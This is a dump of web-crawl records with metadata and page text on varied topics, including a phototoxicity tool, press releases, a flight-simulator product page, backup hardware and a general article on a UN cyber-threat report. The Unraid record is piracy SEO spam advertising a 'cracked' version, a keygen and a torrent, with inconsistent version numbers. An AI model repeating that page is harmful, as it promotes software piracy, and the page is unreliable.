url: string (length 15 – 1.48k)
date: timestamp[s]
file_path: string (length 125 – 155)
language_score: float64 (0.65 – 1)
token_count: int64 (75 – 32.8k)
dump: string (96 distinct values)
global_id: string (length 41 – 46)
lang: string (1 distinct value)
text: string (length 295 – 153k)
domain: string (67 distinct values)
https://mltox.fiit.stuba.sk/sk/
2023-06-06T06:28:27
s3://commoncrawl/crawl-data/CC-MAIN-2023-23/segments/1685224652235.2/warc/CC-MAIN-20230606045924-20230606075924-00443.warc.gz
0.898771
111
CC-MAIN-2023-23
webtext-fineweb__CC-MAIN-2023-23__0__174111641
en
A free online tool for in-silico phototoxicity prediction About the project The aim of the project was to design and build a system for predicting the phototoxicity of substances, both to cross-check measured experimental data and to predict phototoxicity directly, thereby reducing the financial cost of 'wet' experiments. We analyzed data measured on cell cultures, 3D models (tissues) and animals. Using molecular descriptors and machine learning algorithms, we can predict the phototoxicity of selected substances.
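The description above mentions predicting phototoxicity from molecular descriptors with machine learning but does not name the descriptors or models used. A minimal, hypothetical sketch of that general workflow, using RDKit descriptors and a scikit-learn classifier with made-up molecules and labels (not the project's actual code):

```python
# Hypothetical sketch: descriptor-based phototoxicity classification.
# The SMILES strings, labels, and descriptor choice are illustrative only.
from rdkit import Chem
from rdkit.Chem import Descriptors
from sklearn.ensemble import RandomForestClassifier

def featurize(smiles):
    """Turn a SMILES string into a small vector of physicochemical descriptors."""
    mol = Chem.MolFromSmiles(smiles)
    return [Descriptors.MolWt(mol), Descriptors.MolLogP(mol),
            Descriptors.TPSA(mol), Descriptors.NumHDonors(mol)]

train_smiles = ["c1ccc2cc3ccccc3cc2c1", "CCO", "c1ccc2ccccc2c1", "CC(=O)O"]  # toy molecules
train_labels = [1, 0, 1, 0]  # 1 = phototoxic, 0 = non-phototoxic (invented labels)

model = RandomForestClassifier(n_estimators=100, random_state=0)
model.fit([featurize(s) for s in train_smiles], train_labels)

# Predicted probability of phototoxicity for a new substance (benzene, purely as an example).
print(model.predict_proba([featurize("c1ccccc1")]))
```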
systems_science
https://reimaginedmobility.org/reimagined-mobility-coalition-announces-christine-weydig-as-executive-director/
2023-06-04T16:51:06
s3://commoncrawl/crawl-data/CC-MAIN-2023-23/segments/1685224650201.19/warc/CC-MAIN-20230604161111-20230604191111-00018.warc.gz
0.928959
990
CC-MAIN-2023-23
webtext-fineweb__CC-MAIN-2023-23__0__230947865
en
WASHINGTON, D.C. (September 20, 2022)—The Coalition for Reimagined Mobility, a global initiative of the organization SAFE to advance public policy and implement real-world solutions that transform transportation systems to improve the movement of people and goods, announced today that it has selected Christine Weydig as its next Executive Director. “I am excited for the opportunity to lead this incredible initiative. The transportation systems we seek to change have not evolved in decades and now we have a convergence of technologies and business models that can harbinger in a new era that puts people first and the task at hand requires a coalition such as ours,” said Christine Weydig. “Our commissioners are already defining the future of mobility across the passenger and freight sectors; I am excited to bring my nearly two decades of government service and implementation experience to the table, and we will begin our work together with a focus on leveraging digitalization and technology to modernize our transportation systems around the world.” Prior to joining the Coalition, Weydig was the Director of Sustainability at the Port Authority of New York and New Jersey, where she led efforts to achieve industry-leading net-zero climate commitments – developing policy and programs to improve resilience and reduce the carbon footprint of the Agency’s four airports, five seaports, bridges, tunnels, rail systems, buildings, and transportation hubs. Weydig’s career has centered on building public-private partnerships to address the needs of complex energy and transportation systems, placing human wellness and accessibility at the forefront of sustainable transportation and infrastructure development. She has overseen and restructured public-sector energy portfolios to support economic development and worked around the globe for organizations including the U.S. Department of Energy, the U.S. Department of State, the United Nations Development Programme, and the Earth Institute at Columbia University. Weydig will bring these strong relationships and deep experience to the Coalition. “Christine is extremely qualified to take on this important responsibility and engage a diverse set of stakeholders,” said Mary Nichols, Former Chair, California Air Resources Board and current commissioner co-chair for the Coalition. “She is an accomplished leader and has done extensive work to bring complex policy concepts to reality for the transportation and energy sectors. Her deep relationships and know-how are an excellent fit to drive the mission of the Coalition forward.” Weydig will lead the Coalition’s commissioners, a group of industry CEOs, public sector leaders and practitioners across transportation, technology, and sustainability, in setting strategy and building alignment for its mission-driven work to formulate policies and advocate for solutions that reduce oil dependence and carbon emissions, improve air quality, enhance infrastructure resiliency and security, and create economic opportunity and access to transportation systems using new technology and business models.
“Christine’s decades of wide-ranging experience working in the Port Authority of New York and New Jersey will build on the Coalition’s groundbreaking analysis and drive forward its aim of a more reliable, resilient, and sustainable transportation sector,” said Robbie Diamond, Founder, President and CEO of SAFE, a nonpartisan, nonprofit organization that enhances energy security and supports economic resurgence and resiliency by advancing transformative transportation and mobility technologies. “This work requires engagement with local, national, and global entities: Christine has the experience and the political acumen to drive big, bold changes across global transportation systems.” The Coalition for Reimagined Mobility (ReMo) is an initiative of SAFE. For more information about the Coalition, please visit our website: https://reimaginedmobility.org/about/. If you’re interested in getting involved in our mission, you can get in touch at [email protected] or sign up here to receive updates from the Coalition. About the Coalition for Reimagined Mobility As a global initiative of SAFE, the Coalition for Reimagined Mobility (ReMo) brings together industry CEOs, public sector champions and academic leaders from across the transportation, technology, and sustainability sectors. The Coalition advances public policy and real-world solutions to transform transportation systems and achieve the efficient, flexible, resilient, accessible, and sustainable infrastructure and services that are the backbone of a flourishing global economy. For more information, visit reimaginedmobility.org. SAFE is a bipartisan nonprofit that accelerates the real-world deployment of secure, resilient, and sustainable transportation and energy solutions of the United States, and its partners and allies, by shaping policies, perceptions, and practices that create opportunity for all. Visit secureenergy.org. Vice President Communications, ReMo M: +1 202.341.9508
systems_science
https://ngotenders.net/un-report-highlights-growing-threat-of-cyber-warfare/
2024-02-29T20:32:31
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474853.43/warc/CC-MAIN-20240229202522-20240229232522-00892.warc.gz
0.949753
476
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__65899545
en
The United Nations recently released a report that highlights the growing threat of cyber warfare on a global scale. The report, titled “The Cyber Threat Landscape: A Call for Action,” outlines the increasing frequency and sophistication of cyber attacks, as well as the potential consequences for international security and stability. According to the report, cyber attacks have become a primary tool for state and non-state actors to advance their political, military, and economic objectives. These attacks can range from simple data breaches and ransomware attacks to more complex and destructive operations that can disrupt critical infrastructure, such as power grids, transportation systems, and financial institutions. One of the key findings of the report is that the use of cyber warfare is no longer limited to a few technologically advanced nations. Instead, a wide range of actors, including terrorist groups, criminal organizations, and ideological movements, are increasingly using cyber capabilities to achieve their goals and undermine the security of other nations. The report also emphasizes the growing interconnectedness of the global economy and the increasing reliance on digital technologies, which makes countries more vulnerable to cyber threats. As a result, the potential impact of cyber attacks has expanded beyond traditional military targets to include a wide range of civilian infrastructure and systems. The report calls for urgent action to address the growing threat of cyber warfare. It emphasizes the need for greater international cooperation and coordination to develop norms and rules of behavior in cyberspace, as well as to increase the capacity of countries to prevent, mitigate, and respond to cyber attacks. In response to the report, the United Nations Secretary-General has called on member states to prioritize cybersecurity and invest in the development of robust cyber defenses. This includes investing in cybersecurity training and education, building resilient and secure digital infrastructure, and enhancing international cooperation to address cyber threats. The report also underscores the need for greater transparency and accountability regarding cyber operations, as well as the development of mechanisms to attribute cyber attacks to specific actors and hold them accountable for their actions. Overall, the UN report highlights the urgent need for action to address the growing threat of cyber warfare. As technologies continue to advance and societies become more connected, it is essential for nations to work together to prevent and mitigate the potentially devastating impact of cyber attacks on global security and stability. Only through collective efforts can we effectively address the complex and evolving challenges posed by the cyber threat landscape.
systems_science
https://bypassapp.com/unraid-cracked-download-server-full-license-key/
2024-04-24T13:12:54
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296819273.90/warc/CC-MAIN-20240424112049-20240424142049-00414.warc.gz
0.889047
1,653
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__122152565
en
Unraid Server Full Version Activation Key Unraid 6.11.5 Cracked is a proprietary operating system for personal and small business use that provides a combination of features and tools found in traditional standalone servers, as well as features commonly found in NAS systems. It is designed to manage storage and applications in a flexible and scalable manner. The OS allows for multiple operating systems to run on the same system, each with direct access to the physical disk drives and with the ability to be added or removed without affecting other systems. Unraid was developed to address the limitations and complexities faced by users who wanted to run multiple operating systems on a single machine. The idea behind Unraid 2023 Keygen is to provide a simple and efficient way for users to manage and organize their data, applications, and virtual machines, while also allowing for a high level of customization and control. By offering a flexible and scalable solution, Unraid allows users to build their ideal computing environment to fit their specific needs and requirements. Who Can Avail This OS? Unraid 6.11.5 License Key full is primarily aimed at home users, small businesses, and enthusiast users who want to build a high-performance and versatile computing environment. It is ideal for those who want to run multiple operating systems, such as Windows, Linux, and macOS, on the same machine, as well as those who want to store, manage, and protect their data using a single system. Unraid Activator can also be used for running virtual machines, media streaming, and gaming, among other uses. In short, anyone who wants a flexible and scalable solution for managing their data, applications, and virtual machines can use Unraid. Things to Know Before Using Unraid OS Full Version: Before using Unraid 6.11.5 Patch, it is recommended that you have some basic knowledge of computing, storage, and networking concepts, as well as experience with operating systems and virtualization. Additionally, it is important to understand the following: - Unraid uses a custom filesystem, which is different from traditional filesystems used by most operating systems. - Unraid Torrent version operates in a plug-and-play fashion, meaning that drives can be added or removed without affecting the system or data. - Unraid uses a hybrid of traditional parity protection and software-defined storage to provide data protection and fault tolerance. - It supports a wide range of hardware, including different CPU architectures, motherboards, and storage devices. - Unraid allows you to run multiple operating systems on the same machine, each with direct access to the physical drives. - Unraid Server Cracked has a vibrant community that offers support, resources, and plugins to enhance the functionality of the OS. By understanding these concepts, you will be better equipped to use Unraid effectively and get the most out of its features and capabilities. You Can Also Take a Look At: Restoro Full Version License Key Product Key Features: Some of the main features of Unraid Kuyhaa OS include: - Flexible storage management: Unraid allows you to organize and manage your data, applications, and virtual machines in a flexible and scalable manner. - Multiple operating system support: Unraid Server Torrent supports the simultaneous running of multiple operating systems, each with direct access to the physical drives. 
- Parity and data protection: Unraid 94fbr uses a hybrid of traditional parity protection and software-defined storage to provide data protection and fault tolerance. - Virtualization: Unraid Registration Key list supports the creation and management of virtual machines, making it easy to run multiple operating systems on the same machine. - Plug-and-play drive support: It operates in a plug-and-play fashion, allowing you to add or remove drives without affecting the system or data. - Wide hardware compatibility: Unraid 6.11.5 supports a wide range of hardware, including different CPU architectures, motherboards, and storage devices. - Community plugins and add-ons: Unraid Torrent has a vibrant community that offers support, resources, and plugins to enhance the functionality of the OS. - Easy to use and intuitive user interface: This app features a user-friendly and intuitive web interface, making it easy to manage your storage, applications, and virtual machines. These features make Unraid Activation Code a versatile and powerful solution for managing data, applications, and virtual machines, and make it suitable for a wide range of use cases, including home media streaming, gaming, and small business computing. The system requirements for Unraid OS are as follows: - CPU: A 64-bit x86 processor with at least two cores is required. - Memory: A minimum of 4 GB of RAM is recommended, although more is recommended for running multiple virtual machines or demanding applications. - Storage: A USB flash drive with a minimum capacity of 8 GB is required for installing Unraid 6.11.1. You will also need one or more disk drives for storing your data and applications. - Network: A gigabit Ethernet adapter is recommended, although fast Ethernet is supported. - Motherboard: Cracked Unraid 6.11.5 OS supports a wide range of motherboards, but it is recommended to check the compatibility list before purchasing. It is important to note that these are minimum requirements, and performance will vary based on the specific hardware configuration and usage scenario. For more demanding applications, such as running multiple virtual machines, it is recommended to use higher-end hardware with more RAM, CPU cores, and faster disk drives. How to Install Unraid OS? Installing Unraid OS 6.11.3 is a straightforward process that can be completed in a few steps. Here is a general overview of the installation process: - Download the Unraid OS installation image from the official website. - Burn the image to a USB flash drive using a tool like Rufus or Etcher. - Connect the USB flash drive to the target system and boot from it. - Follow the on-screen prompts to select the language and keyboard layout. - Choose the “Install” option and select the disk drives that you want to use for Unraid 6.11.3. - Configure the network settings and set a password for the web interface. - Wait for the installation to complete, which may take several minutes depending on the size of your disk drives. - After the installation is complete, remove the USB flash drive and reboot the system. - Log in to the web interface using a web browser and complete the initial setup process. It is recommended to consult the official Unraid 6.11.5 documentation for a more detailed explanation of the installation process, as well as any specific instructions or considerations that may apply to your particular hardware configuration. Unraid Full Version Registration Process: To register Unraid OS, you need to purchase a license from the official website. 
The license is tied to a specific machine and is used to unlock additional features and capabilities, such as support for more than one parity-protected disk, virtualization, and access to the community plugins and add-ons. Here is a general overview of the registration process: - Purchase a license from the official Unraid website. - Log in to the web interface using a web browser. - Go to the “Settings” section and click on the “Licenses” tab. - Enter the Unraid license key that you received when you purchased the license. - Click the “Activate” button to apply the license to your Unraid system. - Wait for the activation to complete, which may take a few minutes. - After the activation is complete, the additional features and capabilities that are tied to your license will become available. It is important to note that the license is tied to a specific machine and cannot be transferred to another system. If you need to transfer your license to a different machine, you will need to purchase a new license for that machine.
systems_science
http://www.x-aviation.com/catalog/product_info.php/take-command-hot-start-tbm-900-p-158?osCsid=114e784321bfd6f96ef6d0b09381f2d8
2020-04-03T22:53:19
s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370518767.60/warc/CC-MAIN-20200403220847-20200404010847-00025.warc.gz
0.921642
2,056
CC-MAIN-2020-16
webtext-fineweb__CC-MAIN-2020-16__0__106922600
en
Take Command!: Hot Start TBM 900[TBM9001.1.12] X-Aviation is proud to announce our fourth offering that lets you Take Command! The X-Aviation Take Command! brand of products represents the very best of flight simulation immersion, and assures you this Hot Start product is one of the most sophisticated, study sim level aircraft available for X-Plane! Real world pilots test and assist in the development of these products, and real world procedures are followed. It tells you these products are unlike any other product you've seen outside of the ever growing X-Aviation catalog! Want to feel like a real captain? Take Command! Quick start interactive tutorial in sim, custom failure engine, fully simulated icing and rain effects (both on windows and airframe), custom 3D sound engine with real sounds recorded from a TBM 900, G1000 simulation with Synthetic Vision, maintenance simulation to see how much wear and tear the aircraft accumulates, extremely detailed interior and exterior (down to even each LED light modeled in the strobes). This aircraft is simply in a class of its own for features and immersion! Mac, Windows & Linux. X-Plane 11 only. Hot Start is a team comprised of two very talented, well known developers in the X-Plane world. While the name may be new, their previous projects (BetterPushback and the Take Command!: Saab 340A) are far from new and have been met with tons of awards and accolades over the years. Combining forces has allowed these two developers to create the ultimate TBM 900 simulation like none other seen for any flight simulator to date. The main objective for Hot Start was to create a product that not only simulates beautiful artwork and intense systems, but also serves as a learning platform for its pilots. You will become intimate with the knowledge of the PT-6 engine, the costs of maintenance for over-time wear & tear, and how flying specific ways may harm or help the aircraft's longevity. First Time Loading The first time you install and load the aircraft you'll immediately understand why this simulation is so different and special. You'll be greeted with a voice and visual overview live in the cockpit of how to start the engine. It's very in-depth, and allows you to get a good feel for what's going on almost immediately; and it's fun! Systems & Avionics The avionics include a custom simulated G1000 complete with Synthetic Vision. It's not just "there", it actually requires you to properly use the avionics at your disposal or risk harming the aircraft! Everything specific to a TBM 900 is there, and from a systems perspective the small but important nuances are there to a degree never seen before! From the ground up, the avionics simulation has been focused on heavy use of modern multi-threaded CPUs and fluidity. Each custom subsystem, such as the weather radar, TAWS and engine indication systems, to name but a few, is coded to run in its own set of threads and interact with the rest of the avionics in an asynchronous manner. This has allowed us to assemble the aircraft without the usual balancing act of trading graphical fidelity for simulator frame rate. The attention paid to the physical simulation of systems is second to none. For example, the aforementioned weather radar isn't just a pretty display that scans across a pre-existing weather map. It really does simulate radio beam propagation, energy absorption, scattering and reflectivity. What comes out on the display represents the output of a complex ballet of physical calculations.
When you turn up the radar gain, the radar really does alter the way it samples its input beam returns. Huge efforts have been put into the flight and engine model of this aircraft, which was one of the first things that we started working on over a year ago. The results are both impressive and amazing, thanks to one of our beta team members who owns a TBM 900, which meant our developer was able to get real flight time in the aircraft. Beyond this, we also made the aircraft available to other owners and pilots of the aircraft to get their feedback and get the hand flying experience just right. A Personality of Its Own From the start, we have been focusing on making the aircraft "feel" like a real machine. And if you have dealt with real aircraft, you will know that they can be moody at times. Sometimes the engine starts on the first try, sometimes it just seems to want to drag its feet. Other times, you come up to the aircraft and the battery is strangely low, so you need to sit on the ramp after engine start a bit longer to let it charge up. While working on the core systems model in the TBM900, we have taken a great deal of time to focus on getting this kind of "personality" coded into the aircraft. • Heavily multi-threaded systems architecture to leverage performance of modern CPUs with many cores. • Flight model tuned to perform to within a few percent of the real aircraft in the normal flight envelope, including maximum and stall speeds, rate of climb, fuel burn, trim behavior and control feel. • Full aircraft state persistence. Every switch, flight control position, fuel state and on-airport position is restored upon reload. Even between reloads, system resources change in real time. The engine and oil cool down slowly between flights, the battery drains, tires slowly deflate, etc. • Fine-grained systems model, down to individual sub-components. The always-on failure system realistically responds to wear & tear and overstress for each sub-component based on individual load factors. Over-torque, over-temp, frequent starts, hard landings, operating in FOD-contaminated environments and many more all affect individual sub-component wear & tear and service life. • Sub-component wear realistically reflects on aircraft performance. Worn engine parts reduce maximum available power, worn prop reduces top speed, worn tires result in worse grip during ground ops, etc. • Aircraft maintenance manager to inspect and repair or replace any damaged sub-component. The maintenance manager tracks per-airframe operating expenses in a realistic manner to show the real cost of operating the aircraft. • Airframe manager that allows you to operate multiple simulated airframes, each with their own independently tracked wear & tear, livery selections and custom registration marks applied. • Airframes can be automatically synchronized between multiple machines over the network with just a few clicks. This automatically syncs up aircraft position, configuration and wear & tear to simulate multiple users sharing the same physical aircraft. See how your fellow pilots treated the aircraft by checking the maintenance manager and engine trend monitoring outputs. • X-Plane 11 G1000 avionics stack with lots of customizations and overlays to simulate the special extensions in the real TBM900. This includes a custom EICAS, systems synoptic pages and special integration with the extra simulated systems such as the weather radar, TAS, electrics, etc.
• Integrated Synthetic Vision into the PFD with obstacle display, navigation pathways, airport labels and TAWS-B integration. • Integrated live charts display from FAA and Autorouter.aero. Navigraph integration will be available in a future update. • Fully custom electrical system. Simulation of all buses, switching behaviors and reconfigurations. Full circuit breaker system, integrated with the X-Plane failure system, so a failed or failing system can pop a breaker. • Highly accurate PT6 engine model with realistic startup and operating behavior. Engine lag, secondary fuel flow, ITT evolution, response to auxiliary load and many more fine-grained behaviors. • Custom prop governor, with all modes simulated, including electric auto-feather with negative torque sensing. • Crew Alerting System integrated into the avionics stack with all annunciations, takeoff/landing inhibits, flight state filters and "corner cases" simulated. • Environmental Control System integrated into the custom EICAS. Air conditioning and pressurization respond in real time to environmental factors such as ambient temperature, pressure, available engine bleed air, cabin temperature setting, cabin pressure vessel failures, etc. • Custom TAWS-B ground proximity warning system with all annunciations modes, inhibits, real-time impact point prediction and terrain painting up on the MFD to ranges of 200NM. The TAWS-B uses the X-Plane terrain DSF data to construct its database, so it is always "up to date". • GWX 70 weather radar with weather & ground modes and realistic radar return painting. Full simulation of radar beam energy dissipation, signal attenuation when passing through dense weather and vertical cell analysis modes. Terrain mapping accurately paints surface features, including recognizable peaks, valleys and lakes. Supports the X-Plane 11 default atmospheric model as well as xEnviro. • GTS 820 Traffic Advisory System (TAS) with aural alerts + visual alerts, the TAS MFD page and compatibility with X-Plane default traffic, PilotEdge, Vatsim and IVAO. • Full simulation of the ESI-2000 standby instrument, including all configuration pages, sensor failures, AHRS drift and "roll-over" during extreme maneuvers, realistic battery operation and real-time battery depletion, etc. • Dynamic custom registration mark painting on the fuselage and instrument panel with support for custom TrueType fonts, colors and positioning. This lets livery painters make a "generic" livery and each pilot apply their own custom registration mark with just the click of a button directly in the simulator. Liveries can specify a custom position and font to optimize the look. • Custom sound engine with samples from the real aircraft and accurate modeling of individual engine states and sub-component noises such as fuel pumps, gear pumps, flap actuators, etc. • Includes quick start and user interface guides.
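The weather-radar description above mentions beam energy dissipation and signal attenuation when passing through dense weather. As a rough, hypothetical illustration of that general idea (a toy model, not Hot Start's actual radar code), a beam can be marched through range cells, losing energy to each cell it crosses so that a strong storm cell shadows whatever lies behind it:

```python
# Toy one-dimensional radar model: per-cell echo power with two-way attenuation.
def radar_returns(reflectivity, attenuation, tx_power=1.0):
    """reflectivity: fraction of incident power each range cell scatters back (0..1).
    attenuation:  one-way transmission factor of each cell (1.0 = clear air, lower = dense rain).
    """
    echoes = []
    outgoing = tx_power   # power arriving at the current cell
    path = 1.0            # cumulative one-way attenuation between antenna and current cell
    for refl, atten in zip(reflectivity, attenuation):
        outgoing *= atten
        path *= atten
        echoes.append(outgoing * refl * path)   # echo is attenuated again on the way back
        outgoing *= (1.0 - refl)                # unscattered power continues outward
    return echoes

# A dense cell early in the path "shadows" the cells behind it.
print(radar_returns([0.05, 0.60, 0.10, 0.10], [0.98, 0.60, 0.95, 0.95]))
```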
systems_science
https://prerelease.barnesandnoble.com/w/soft-systems-methodology-brian-wilson/1102332456?ean=9780471894896
2020-03-31T11:19:21
s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370500426.22/warc/CC-MAIN-20200331084941-20200331114941-00253.warc.gz
0.896165
416
CC-MAIN-2020-16
webtext-fineweb__CC-MAIN-2020-16__0__102354683
en
Soft Systems Methodology: Conceptual Model Building and Its Contribution / Edition 1 available in Hardcover Conceptual model building is accepted as a key phase in Soft Systems Methodology. Despite the recognition of the importance of SSM, students are still experiencing difficulty with the basic process of conceptual model building. This book addresses that issue. Product dimensions: 6.89(w) x 9.88(h) x 0.79(d) About the Author BRIAN WILSON has a background in nuclear power engineering and control system design. In 1966 he became a founding member of the Department of Systems Engineering at the University of Lancaster, where he pursued the application of control principles to management problem solving. There he was involved in the development and use of Human Activity Systems and 'verbs in the imperative' in place of mathematics as the modelling language for the intellectual processes involved and maintained particular interest in the application of SSM to information and organisation-based analysis. This research was published in Systems: Concepts, Methodologies and Applications by John Wiley & Sons. In 1992 he founded his own consulting company, Brian Wilson Associates, where he continues to develop and apply his unique brand of Soft Systems Methodology. Table of Contents Foreword by Mike Duffy. Preface. Preamble. Models and Methodology. Basic Principles of HAS Modelling. Selection of Relevant Systems. Business Process Re-engineering. The Consensus Primary Task Model. CPTM Formulation Using Wider-system Extraction. CPTM Assembly Using the Enterprise Model. Application to Training Strategy and HR. Generic Model Building. Conclusions. Appendix 1: The Albion Case. Appendix 2: Exercises. Appendix 3: The Development of the United Kingdom's Single Army Activity Model and Associated Information Needs and its Relationship to Command and Control. Appendix 4: An Overview of Soft Systems Methodology. Appendix 5: Example of Applying Information Analysis Method to Airspace Control Function. Appendix 6: Examples of Product to Information Category Mapping. References. Index.
systems_science
http://datto.com/products/siris-2/
2015-06-02T13:22:17
s3://commoncrawl/crawl-data/CC-MAIN-2015-22/segments/1433195035761.14/warc/CC-MAIN-20150601214355-00036-ip-10-180-206-219.ec2.internal.warc.gz
0.899499
1,218
CC-MAIN-2015-22
webtext-fineweb__CC-MAIN-2015-22__0__201820279
en
Datto SIRIS 2 is a complete family of enterprise business continuity solutions, available in both physical and virtual platforms, built from the ground up, for businesses of every size. When downtime isn’t an option, SIRIS 2 is the preferred choice. To get the benefits of SIRIS using hardware you already have, try GENISIS. Dramatically reduce downtime with backups saved both locally and in the cloud. Redundancy in data protection better protects users from the unexpected. Advanced bandwidth management software, local restoration and full cloud data copies are among the many advantages of this solution. This proprietary technology eliminates broken backup chains. Each time a backup occurs, data is converted directly into a virtual machine, with the most recent backup image always being the base image. Data is always available immediately, both on and off-site. This groundbreaking proprietary technology allows you to identify file or application changes between any two backup points. You can easily find that deleted folder or determine which files a virus affected. No more guessing if your backup is working properly. Datto boots backups as virtual machines, capturing an image of the login page to give you visual proof that your data has been successfully backed up. An industry first. All SIRIS 2 devices come equipped with hot-swappable drive bays. This enables MSPs to perform on-site field upgrades, within each product line. It’s never been easier to scale solutions and grow with your customers. Learn more about the SIRIS 2 product line. “The features and benefits of Datto’s SIRIS solution are far superior than the other off-site storage solutions we have evaluated in the past, but that’s not what makes Datto a pleasure to work with. From implementation to ease of use, their product aligns with our core services, but their client service is the key reason why working with Datto is such a delight.” - Strategic Initiatives Consultant, River Run Computers “Datto SIRIS backup … the best thing since sliced bread.” - Founder and President, DLC Technology “Since [Datto] SIRIS ‘tests itself’, it’s been smooth sailing. I am confident in the event of a disaster that my data will be recovered quickly.” - President and Managing Partner, Greenwire Solutions Datto virtual appliances now support VMware, Hyper-V and XenServer. Our Intelligent Business Continuity solution can now be purchased as a virtual appliance on virtual infrastructure in addition to our physical hardware. Using image-based backup allows Datto to take an image (i.e., a picture) of an entire system, not simply individual files or applications. This contributes to a superior Recovery Time Objective (RTO) and the ability to boot virtual machines. Image-based backup is an integral component of Intelligent Business Continuity. Datto devices now come standard with Solid State OS Drives for improved speed and reliability, Hot-Swappable Drive Bays for easy scalability, and RAID for added redundancy. Backups can be virtualized locally to the Datto device or to the secure Datto cloud, instantly, with the click of a button. This unique feature is a key component of intelligent business continuity. Should a local disaster occur, business can continue as usual in the Datto cloud. All data is protected by AES 256 encryption both in transit and in the cloud. Additionally, users have the option to encrypt data locally, and pass phrases can be specified per appliance or per protected machine to meet compliance regulations.
Power is nothing without control, and Datto offers a meticulously refined toolkit for device and account management. A single pane of glass is used to configure devices, schedule backup reports, monitor off-site amounts, set up alerts and more. All data sent off-site is compressed using LZMA2 compression to ensure maximum efficiency and provide a stellar user experience even in low bandwidth and high network traffic environments. eDiscovery gives Datto users the ability to perform granular recoveries from Microsoft Exchange Server and Microsoft Office SharePoint Server. Powered by Ontrack® PowerControls™ from industry leader Kroll Ontrack, eDiscovery makes it easy to search documents, emails and attachments by keyword and restore exactly what you need. Datto utilizes the image-based ShadowSnap™ agent, developed in conjunction with StorageCraft. ShadowSnap is based on the premise of dual backup engines: application-aware VSS by default, with the engine as a safety net. ShadowSnap is particularly useful in performing bare metal restores as it supports dissimilar hardware. AgentSync is Datto’s proprietary technology for quickly and efficiently transferring files to and from the cloud. It allows users to prioritize server backup order, pipeline recovery points, and set up multiple agents to sync off-site simultaneously. This provides greater data integrity, reduces network traffic, and keeps off-site backups up to date. Datto supports Microsoft Windows operating systems for almost any Windows PC or server that is still in production today. Support currently ranges from Windows 2000 to Windows 8 and Server 2012. Granular recovery is also available for Exchange and SharePoint servers. Restore full machines quickly and efficiently through our USB Bare Metal Restore process. Go from physical machines to virtual (P2V) or vice versa with our unique dissimilar hardware tool that allows for maximum flexibility when restoring. No drives or cables needed as the system can run completely over the user’s network. Datto uses the latest networking technology to increase speed and performance.
500GB-60TB Storage Capacity (Per Unit)
Hot-Swappable Drive Bays for Easy Field Upgrades
Solid-State OS Drives on All Models
Available 2 x 2.4 GHz Xeon Six Core Processor
IPMI Standard on Rackmount Units
RAID 1 - RAID 10 Storage Configurations
Unlimited Server, Workstation and Desktop Licensing
3 Year Hardware Warranty
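The backup-comparison capability described above (finding which files changed between any two backup points) can be illustrated with a hypothetical, heavily simplified sketch that hashes the files in two snapshot directories and reports additions, deletions, and modifications. This is only an illustration of the idea, not Datto's implementation; the snapshot paths are placeholders:

```python
# Hypothetical sketch of comparing two backup snapshots by file hash.
import hashlib
import os

def snapshot_index(root):
    """Map each file path (relative to root) to a SHA-256 digest of its contents."""
    index = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                index[os.path.relpath(path, root)] = hashlib.sha256(f.read()).hexdigest()
    return index

def diff_snapshots(old_root, new_root):
    """Return files added, deleted, and modified between two snapshot directories."""
    old, new = snapshot_index(old_root), snapshot_index(new_root)
    added = sorted(set(new) - set(old))
    deleted = sorted(set(old) - set(new))
    modified = sorted(p for p in set(old) & set(new) if old[p] != new[p])
    return added, deleted, modified

# Example usage (paths are placeholders for two mounted backup points):
# added, deleted, modified = diff_snapshots("/backups/point_a", "/backups/point_b")
```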
systems_science
https://www.spectrotel.com/resource-center/press-releases/detail/2023/09/21/spectrotel-hires-jon-moss-to-lead-digital-transformation-of-customer-experience
2024-04-19T19:21:36
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817442.65/warc/CC-MAIN-20240419172411-20240419202411-00780.warc.gz
0.916736
618
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__115653530
en
Spectrotel Hires Jon Moss to Lead Digital Transformation of Customer Experience Grain Management supports multi-million-dollar investment in Spectrotel Managed Network Services NEPTUNE, NJ (September 21, 2023) – Spectrotel, Inc., a next-generation aggregator and leading integrated communication services provider, today announced the appointment of Jon Moss as Vice President of Digital Transformation concurrent with a multi-million-dollar investment to take Spectrotel Managed Network Services to the next level. The new technology initiative is supported by Grain Management (“Grain”), which approved the project following the acquisition of Spectrotel earlier this year. Jon is a technology leader with a deep background in cloud scale software engineering, big data analytics, network observability, AIOps and automation. He joins Spectrotel from Zayo and, prior to that, QOS Networks, which was acquired by Zayo, where he built and scaled the technology approach behind their industry-leading service management platform. Jon is enthusiastic about creating a rich digital customer experience backed by highly scalable enterprise software stacks. He intends to turbocharge Spectrotel’s Managed Network Services by expanding the network management platform, developing a proactive, predictive, and prescriptive observability posture using AIOps and enhanced analytics, and continually investing in network automation. “There couldn’t be a more exciting time to invest in bringing software to the network,” said Moss. “With advances in AI, machine learning, and continued adoption of advanced networking products, we can accelerate our customers’ digital transformation with a best-in-market platform. I am proud to join an incredibly talented team at such a pivotal time for the organization, and I can’t wait to see what we can do.” “Spectrotel has built a solid foundation in Managed Network Services that complements our market leadership position in network service aggregation,” said Ross Artale, Spectrotel CEO. “With Grain’s support, we are now ready to take this part of our business to the next level and redefine the total customer experience by providing services that help them truly transform their operation, enhance performance, and introduce a new level of innovation to their businesses. We are delighted to have Jon join our leadership team with a focus on leading our technology transformation that will facilitate this effort.” As the Next Generation Aggregator, Spectrotel is uniquely positioned to address the IT challenges of today and tomorrow. Leveraging their expansive relationships with best-in-class technology providers, together with their thorough approach to understanding customer-specific organizational requirements, Spectrotel delivers comprehensive solutions to minimize risk, optimize resources and technology, and modernize the enterprise. Vice President, Marketing & Product
systems_science
https://www.chameleon-system.de/en/chameleon-features/auftragsabwicklung-logistik/interface-tradebyte_aid_489.html
2023-04-02T05:30:11
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950383.8/warc/CC-MAIN-20230402043600-20230402073600-00740.warc.gz
0.907475
475
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__194059687
en
